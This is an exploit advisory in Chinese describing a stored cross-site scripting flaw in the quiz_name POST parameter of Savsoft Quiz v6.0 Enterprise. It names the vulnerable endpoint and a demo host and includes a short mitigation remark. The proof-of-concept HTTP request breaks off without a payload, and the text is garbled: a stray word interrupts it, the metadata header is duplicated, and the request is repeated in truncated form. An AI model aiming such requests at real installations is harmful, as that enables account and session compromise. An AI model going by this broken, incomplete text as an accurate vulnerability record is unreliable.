#漏洞利用标题: Savsoft Quiz v6.0 企业版 - 存储型跨站脚本(XSS)
#日期: 2024-01-03
#利用作者: Eren Sen
#vendor: Savsoft测验
#供应商HomePage: https://savsoftquiz.com
#软件link: https://savsoftquiz.com/web/index.php/online-demo/
#版本: 6.0
#cve-id: n/a
#测试在: Kali Linux/Windows 10
#发现日期: 2024/01/03
#存储型跨站脚本(XSS)漏洞
#存在漏洞的参数类型: POST
#存在漏洞的参数: quiz_name
#缓解建议: 在页面输出 quiz_name 时进行 HTML 编码,并在服务端对该字段做输入校验(本页未说明该值具体在何处被输出)。
#概念证明:
#HTTP请求:
POST /savsoft_quizdemk1my5jr/index.php/quiz/insert_quiz HTTP/1.1
Host: demos1.softaculous.com
Cookie: ci_session=
脚本
#日期: 2024-01-03
#利用作者: Eren Sen
#vendor: Savsoft测验
#供应商HomePage: https://savsoftquiz.com
#软件link: https://savsoftquiz.com/web/index.php/online-demo/
#版本: 6.0
#cve-id: n/a
#测试在: Kali Linux/Windows 10
#发现日期: 2024/01/03
#存储型跨站脚本(XSS)漏洞
#存在漏洞的参数类型: POST
#存在漏洞的参数: quiz_name
#概念证明:
demos1.softaculous.com
POST /savsoft_quizdemk1my5jr/index.php/quiz/insert_quiz HTTP/1.1
Host: demos1.softaculous.com
Cookie: ci_session=